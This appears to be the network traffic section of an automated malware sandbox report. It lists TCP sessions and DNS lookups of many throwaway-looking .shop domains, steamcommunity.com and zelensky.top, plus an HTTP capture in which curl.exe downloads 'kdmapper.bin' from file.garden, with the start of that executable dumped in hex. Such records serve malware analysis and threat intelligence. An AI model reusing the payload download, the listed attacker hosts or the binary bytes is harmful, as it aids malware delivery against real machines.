                                                                                                                                                                                                            Sep 30, 2024 18:33:36.616045952 CEST49705443192.168.2.7104.102.49.254
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.616067886 CEST44349705104.102.49.254192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.616116047 CEST49705443192.168.2.7104.102.49.254
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.621305943 CEST44349705104.102.49.254192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.621433973 CEST49705443192.168.2.7104.102.49.254
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.621447086 CEST44349705104.102.49.254192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.621488094 CEST49705443192.168.2.7104.102.49.254
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.621543884 CEST44349705104.102.49.254192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.621591091 CEST49705443192.168.2.7104.102.49.254
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.624766111 CEST49705443192.168.2.7104.102.49.254
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.624784946 CEST44349705104.102.49.254192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.624799013 CEST49705443192.168.2.7104.102.49.254
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.624803066 CEST44349705104.102.49.254192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.643245935 CEST49706443192.168.2.7172.67.197.40
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.643296957 CEST44349706172.67.197.40192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.643405914 CEST49706443192.168.2.7172.67.197.40
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.643882036 CEST49706443192.168.2.7172.67.197.40
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.643893957 CEST44349706172.67.197.40192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.110898972 CEST44349706172.67.197.40192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.111074924 CEST49706443192.168.2.7172.67.197.40
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.112860918 CEST49706443192.168.2.7172.67.197.40
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.112873077 CEST44349706172.67.197.40192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.113140106 CEST44349706172.67.197.40192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.114392042 CEST49706443192.168.2.7172.67.197.40
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.114422083 CEST49706443192.168.2.7172.67.197.40
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.114459038 CEST44349706172.67.197.40192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.618232012 CEST44349706172.67.197.40192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.618321896 CEST44349706172.67.197.40192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.618371964 CEST49706443192.168.2.7172.67.197.40
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.618671894 CEST49706443192.168.2.7172.67.197.40
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.618689060 CEST44349706172.67.197.40192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.618700981 CEST49706443192.168.2.7172.67.197.40
                                                                                                                                                                                                            Sep 30, 2024 18:33:37.618705988 CEST44349706172.67.197.40192.168.2.7
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Sep 30, 2024 18:33:28.920409918 CEST6354053192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:28.935391903 CEST53635401.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.150866032 CEST5172053192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.217473984 CEST53517201.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.223222017 CEST5040353192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.234625101 CEST53504031.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.239059925 CEST6075953192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.250467062 CEST53607591.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.254192114 CEST5463653192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.264708996 CEST53546361.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.268713951 CEST6544053192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.280442953 CEST53654401.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.282658100 CEST6402453192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.293987036 CEST53640241.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.295906067 CEST5885053192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.305022955 CEST53588501.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.312037945 CEST4969453192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.323560953 CEST53496941.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.325815916 CEST5195653192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.341551065 CEST53519561.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.345031023 CEST5674953192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.353195906 CEST53567491.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.628906965 CEST5721453192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.642276049 CEST53572141.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:34:03.740284920 CEST5842353192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:34:03.748002052 CEST53584231.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:34:11.572530031 CEST6286153192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:34:11.663695097 CEST53628611.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:34:39.536142111 CEST5045853192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:34:39.544256926 CEST53504581.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:34:48.243483067 CEST5168653192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:34:48.333282948 CEST53516861.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:34:55.511776924 CEST5416853192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:34:55.716351032 CEST53541681.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:35:03.837353945 CEST6495553192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:35:03.845865011 CEST53649551.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:35:10.308026075 CEST5861453192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:35:10.316037893 CEST53586141.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:35:16.531891108 CEST5773453192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:35:16.623128891 CEST53577341.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:35:21.400111914 CEST6542253192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:35:21.492620945 CEST53654221.1.1.1192.168.2.7
                                                                                                                                                                                                            Sep 30, 2024 18:35:29.781616926 CEST6514553192.168.2.71.1.1.1
                                                                                                                                                                                                            Sep 30, 2024 18:35:30.033530951 CEST53651451.1.1.1192.168.2.7
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Sep 30, 2024 18:33:28.920409918 CEST192.168.2.71.1.1.10xd0f9Standard query (0)file.gardenA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.150866032 CEST192.168.2.71.1.1.10x5af2Standard query (0)tiddymarktwo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.223222017 CEST192.168.2.71.1.1.10xef06Standard query (0)surveriysiop.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.239059925 CEST192.168.2.71.1.1.10x562aStandard query (0)captainynfanw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.254192114 CEST192.168.2.71.1.1.10xf7dStandard query (0)tearrybyiwo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.268713951 CEST192.168.2.71.1.1.10xf1c3Standard query (0)appleboltelwk.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.282658100 CEST192.168.2.71.1.1.10x96f2Standard query (0)tendencerangej.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.295906067 CEST192.168.2.71.1.1.10x8231Standard query (0)fossillargeiw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.312037945 CEST192.168.2.71.1.1.10x3d79Standard query (0)coursedonnyre.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.325815916 CEST192.168.2.71.1.1.10x31b4Standard query (0)strappystyio.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.345031023 CEST192.168.2.71.1.1.10x63b6Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.628906965 CEST192.168.2.71.1.1.10xeac9Standard query (0)offeviablwke.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:34:03.740284920 CEST192.168.2.71.1.1.10xf981Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:34:11.572530031 CEST192.168.2.71.1.1.10xadf9Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:34:39.536142111 CEST192.168.2.71.1.1.10xc75dStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:34:48.243483067 CEST192.168.2.71.1.1.10x41a0Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:34:55.511776924 CEST192.168.2.71.1.1.10x3254Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:35:03.837353945 CEST192.168.2.71.1.1.10xb10dStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:35:10.308026075 CEST192.168.2.71.1.1.10x6139Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:35:16.531891108 CEST192.168.2.71.1.1.10xb8a5Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:35:21.400111914 CEST192.168.2.71.1.1.10x1a7fStandard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:35:29.781616926 CEST192.168.2.71.1.1.10xa098Standard query (0)zelensky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Sep 30, 2024 18:33:28.935391903 CEST1.1.1.1192.168.2.70xd0f9No error (0)file.garden188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:28.935391903 CEST1.1.1.1192.168.2.70xd0f9No error (0)file.garden188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.217473984 CEST1.1.1.1192.168.2.70x5af2Name error (3)tiddymarktwo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.234625101 CEST1.1.1.1192.168.2.70xef06Name error (3)surveriysiop.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.250467062 CEST1.1.1.1192.168.2.70x562aName error (3)captainynfanw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.264708996 CEST1.1.1.1192.168.2.70xf7dName error (3)tearrybyiwo.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.280442953 CEST1.1.1.1192.168.2.70xf1c3Name error (3)appleboltelwk.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.293987036 CEST1.1.1.1192.168.2.70x96f2Name error (3)tendencerangej.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.305022955 CEST1.1.1.1192.168.2.70x8231Name error (3)fossillargeiw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.323560953 CEST1.1.1.1192.168.2.70x3d79Name error (3)coursedonnyre.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.341551065 CEST1.1.1.1192.168.2.70x31b4Name error (3)strappystyio.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:35.353195906 CEST1.1.1.1192.168.2.70x63b6No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.642276049 CEST1.1.1.1192.168.2.70xeac9No error (0)offeviablwke.site172.67.197.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:33:36.642276049 CEST1.1.1.1192.168.2.70xeac9No error (0)offeviablwke.site104.21.84.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:34:03.748002052 CEST1.1.1.1192.168.2.70xf981Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:34:11.663695097 CEST1.1.1.1192.168.2.70xadf9Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:34:39.544256926 CEST1.1.1.1192.168.2.70xc75dName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:34:48.333282948 CEST1.1.1.1192.168.2.70x41a0Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:34:55.716351032 CEST1.1.1.1192.168.2.70x3254Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:35:03.845865011 CEST1.1.1.1192.168.2.70xb10dName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:35:10.316037893 CEST1.1.1.1192.168.2.70x6139Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:35:16.623128891 CEST1.1.1.1192.168.2.70xb8a5Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:35:21.492620945 CEST1.1.1.1192.168.2.70x1a7fName error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 30, 2024 18:35:30.033530951 CEST1.1.1.1192.168.2.70xa098Name error (3)zelensky.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            • file.garden
                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                            • offeviablwke.site
                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.749701188.114.96.34433492C:\Windows\System32\curl.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-09-30 16:33:29 UTC104OUTGET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1
                                                                                                                                                                                                            Host: file.garden
                                                                                                                                                                                                            User-Agent: curl/7.83.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            2024-09-30 16:33:29 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Mon, 30 Sep 2024 16:33:29 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 2284739
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-powered-by: Express
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                                                            last-modified: Fri, 20 Sep 2024 19:21:00 GMT
                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 853928
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ms6BkWErCFD8RU1%2BlmuMnRXAyDEUIRJW0Yxr9YjlagJAzEXoyup0W%2FSQsljSprbD19y3D53HsZyUY3OWCuuN4VPg6cjj7rcVkDoB%2Ba2io33qiHcMDirLvBtZqL4%2BVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8cb59d6f98c94392-EWR
                                                                                                                                                                                                            2024-09-30 16:33:29 UTC552INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d
                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>
                                                                                                                                                                                                            2024-09-30 16:33:29 UTC1369INData Raw: 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: `.rdata0 @@.data G@.didat0@.rsrc@@@.reloc<# $@B
                                                                                                                                                                                                            2024-09-30 16:33:29 UTC1369INData Raw: 3c cf 00 00 32 c0 5d c2 1c 00 55 8b ec 83 ec 4c ff 75 08 8d 4d b4 e8 2a 02 00 00 8b 4d f4 83 f9 08 73 0a 8b 45 0c 89 44 8d b4 ff 45 f4 8d 4d b4 e8 48 02 01 00 c9 c2 08 00 56 ff 74 24 08 8b f1 33 c0 89 06 89 46 04 89 46 08 89 46 0c 88 46 10 e8 5c 03 00 00 8b c6 5e c2 04 00 b8 35 26 43 00 e8 92 d7 01 00 51 51 53 56 8b f1 89 75 f0 e8 62 81 00 00 33 db c7 06 f8 35 43 00 8d 8e 38 10 00 00 89 5d fc e8 2d 4a 00 00 8d 8e f8 20 00 00 c6 45 fc 01 e8 27 ba 00 00 8d 8e 98 22 00 00 89 9e e8 21 00 00 89 9e ec 21 00 00 e8 4a 01 00 00 8d 8e e8 45 00 00 e8 3f 01 00 00 8b 4d 08 85 c9 c6 45 fc 04 0f 94 c0 89 9e d4 21 00 00 88 86 d0 21 00 00 85 c9 75 23 68 f0 92 00 00 e8 d7 d6 01 00 59 89 45 ec c6 45 fc 05 85 c0 74 09 8b c8 e8 91 a0 00 00 eb 06 8b c3 eb 02 8b c1 89 86 d4 21
                                                                                                                                                                                                            Data Ascii: <2]ULuM*MsEDEMHVt$3FFFF\^5&CQQSVub35C8]-J E'"!!JE?ME!!u#hYEEt!
                                                                                                                                                                                                            2024-09-30 16:33:29 UTC1369INData Raw: 0b 8d 46 32 50 6a 39 e8 a5 fa ff ff 6a 02 b9 98 10 44 00 e8 3f 53 00 00 5e c2 04 00 53 56 8b f1 33 db 57 53 8b 3e 38 9e 3c 22 00 00 74 3d 8b 86 d8 6c 00 00 8b 4f 10 83 c0 14 53 50 ff 15 78 32 43 00 8b ce ff 57 10 8b ce e8 05 22 00 00 85 c0 74 15 83 be f4 21 00 00 75 75 0c 8b 44 24 10 39 58 04 0f 97 c0 eb 3c 32 c0 eb 38 e8 85 08 00 00 8b 4f 10 52 50 ff 15 78 32 43 00 8b ce ff 57 10 68 70 36 43 00 8b ce e8 3d 26 00 00 85 c0 74 11 ff 74 24 10 8b ce e8 db 04 00 00 84 c0 74 02 b3 01 8a c3 5f 5e 5b c2 04 00 80 b9 d4 6c 00 00 00 8b 54 24 04 74 1a 8b c2 f7 d8 83 e0 0f 03 d0 83 b9 c8 6c 00 00 03 75 05 83 c2 10 eb 03 83 c2 08 8b c2 c2 04 00 55 8b e9 80 bd ce 6c 00 00 00 75 04 32 c0 eb 41 8b 45 00 53 56 57 8b 70 14 8b ce ff 15 78 32 43 00 8b cd ff d6 ff 74 24 14 8b
                                                                                                                                                                                                            Data Ascii: F2Pj9jD?S^SV3WS>8<"t=lOSPx2CW"t!uuD$9X<28ORPx2CWhp6C=&tt$t_^[lT$tluUlu2AESVWpx2Ct$
                                                                                                                                                                                                            2024-09-30 16:33:29 UTC1369INData Raw: c0 75 04 6a 02 eb 10 3c 01 75 04 6a 03 eb 08 2c 02 3c 02 77 03 6a 04 59 8b c1 c2 08 00 b8 73 26 43 00 e8 1e cd 01 00 83 ec 18 53 33 db 8b c1 89 45 f0 89 5d dc 89 5d e0 89 5d e4 89 5d e8 88 5d ec 53 53 8d 4d dc 89 5d fc 51 8b c8 e8 36 1d 00 00 84 c0 0f 84 83 00 00 00 56 57 8b 7d e0 8d 4d dc 6a 01 e8 97 f8 ff ff 8b 4d e0 8b 45 dc 8b 75 08 88 5c 01 ff 8d 47 01 50 8b ce e8 f6 f9 ff ff 8b 45 f0 83 b8 c8 6c 00 00 03 75 0f ff 76 04 ff 36 ff 75 dc e8 6f fd 00 00 eb 2d f6 80 0c 46 00 00 01 74 17 d1 ef 57 ff 36 ff 75 dc e8 19 fd 00 00 8b 06 33 c9 66 89 0c 78 eb 0d ff 76 04 ff 36 ff 75 dc e8 89 fc 00 00 ff 36 e8 11 1f 02 00 59 50 8b ce e8 9e f9 ff ff 5f b3 01 5e 8b 45 dc c7 45 fc 02 00 00 00 85 c0 74 19 80 7d ec 00 74 0c ff 75 e4 50 e8 19 d5 00 00 8b 45 dc 50 e8 f9
                                                                                                                                                                                                            Data Ascii: uj<uj,<wjYs&CS3E]]]]]SSM]Q6VW}MjMEu\GPEluv6uo-FtW6u3fxv6u6YP_^EEt}tuPEP
                                                                                                                                                                                                            2024-09-30 16:33:29 UTC1369INData Raw: e9 75 0d 8b 47 18 2b c2 83 f8 01 75 03 8d 69 01 8d b3 28 10 00 00 55 8b ce e8 13 fd ff ff 55 ff 36 8b cf e8 a9 a8 00 00 e9 90 04 00 00 8b cf e8 3b a9 00 00 8b c8 89 44 24 20 c1 e9 02 8d ab 08 21 00 00 80 e1 01 88 8b 06 21 00 00 8b c8 c1 e9 03 80 e1 01 88 8b 07 21 00 00 c6 83 08 22 00 00 00 c6 45 00 00 a8 01 74 29 8b cf e8 ff a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 55 8b cf e8 4b a8 00 00 8b 44 24 20 c6 84 1e 08 21 00 00 00 a8 02 74 2b 8b cf e8 d2 a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 8d 83 08 22 00 00 8b cf 50 e8 18 a8 00 00 c6 84 1e 08 22 00 00 00 80 bb 06 21 00 00 00 74 0d 8b cf e8 9e a8 00 00 89 83 08 23 00 00 80 bb 07 21 00 00 00 74 0d 8b cf e8 88 a8 00 00 89 83 0c 23 00 00 c6 83 05 21 00 00 01 e9 c4 03 00 00 8b cf e8 6f a8 00
                                                                                                                                                                                                            Data Ascii: uG+ui(UU6;D$ !!!"Et);rVUKD$ !t+;rV"P"!t#!t#!o
                                                                                                                                                                                                            2024-09-30 16:33:29 UTC1369INData Raw: ff d6 83 f8 08 74 0c 8b cb e8 09 17 00 00 e9 e2 09 00 00 33 c9 8d 45 40 51 51 51 51 50 8b 83 d4 21 00 00 8d b3 38 10 00 00 05 24 60 00 00 50 6a 04 51 8b ce e8 1c 37 00 00 89 75 3c eb 03 88 4d 5a 57 8d 4d 1c e8 5b a4 00 00 83 7d 34 00 74 b7 8d 4d 1c e8 89 a2 00 00 0f b7 c0 8d 4d 1c 89 83 fc 21 00 00 c6 83 0c 22 00 00 00 e8 5a a2 00 00 8d 4d 1c 0f b6 f0 e8 66 a2 00 00 0f b7 c0 8d 4d 1c 89 83 04 22 00 00 c1 e8 0e 24 01 88 83 0c 22 00 00 e8 4a a2 00 00 0f b7 c8 89 8b 08 22 00 00 89 b3 00 22 00 00 3b cf 73 0c 8b cb e8 41 f7 ff ff e9 3f 09 00 00 8b c6 6a 02 5a 83 e8 73 74 2a 83 e8 01 74 1b 83 e8 06 74 09 83 e8 01 75 28 6a 05 eb 02 6a 03 58 89 83 00 22 00 00 8b f0 eb 17 89 93 00 22 00 00 8b f2 eb 0d 33 f6 c7 83 00 22 00 00 01 00 00 00 46 89 b3 f4 21 00 00 83 fe
                                                                                                                                                                                                            Data Ascii: t3E@QQQQP!8$`PjQ7u<MZWM[}4tMM!"ZMfM"$"J"";sA?jZst*ttu(jjX""3"F!
                                                                                                                                                                                                            2024-09-30 16:33:29 UTC1369INData Raw: 50 e8 4c 10 02 00 40 59 3b f8 76 22 68 00 08 00 00 ff 75 54 8b cf 2b c8 51 8d 8d d0 df ff ff 03 c1 50 8b c1 8d 4d 00 57 50 e8 1a 3b 00 00 8b 4d 54 33 c0 66 39 01 75 14 6a 01 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 30 d4 00 00 56 8b cb e8 a2 f2 ff ff e9 3f 01 00 00 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 db ec 00 00 8b 46 0c 2b 45 50 f7 46 08 00 04 00 00 8d 78 e0 74 03 8d 78 d8 85 ff 0f 8e f6 00 00 00 8d 8e 28 10 00 00 57 e8 eb f1 ff ff 57 8d be 28 10 00 00 ff 37 8d 4d 1c e8 7a 9d 00 00 68 78 36 43 00 ff 75 54 e8 59 0f 02 00 59 59 85 c0 0f 85 c2 00 00 00 83 be 2c 10 00 00 14 0f 82 b5 00 00 00 8b 0f 0f b6 41 0b 99 8b f0 8b fa 0f b6 41 0a 0f a4 f7 08 99 c1 e6 08 03 f0 0f b6 41 09 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 0f b6 41 08 13 fa 99 0f a4 f7 08 c1 e6
                                                                                                                                                                                                            Data Ascii: PL@Y;v"huT+QPMWP;MT3f9ujhQP0V?hQPF+EPFxtx(WW(7Mzhx6CuTYYY,AAAA
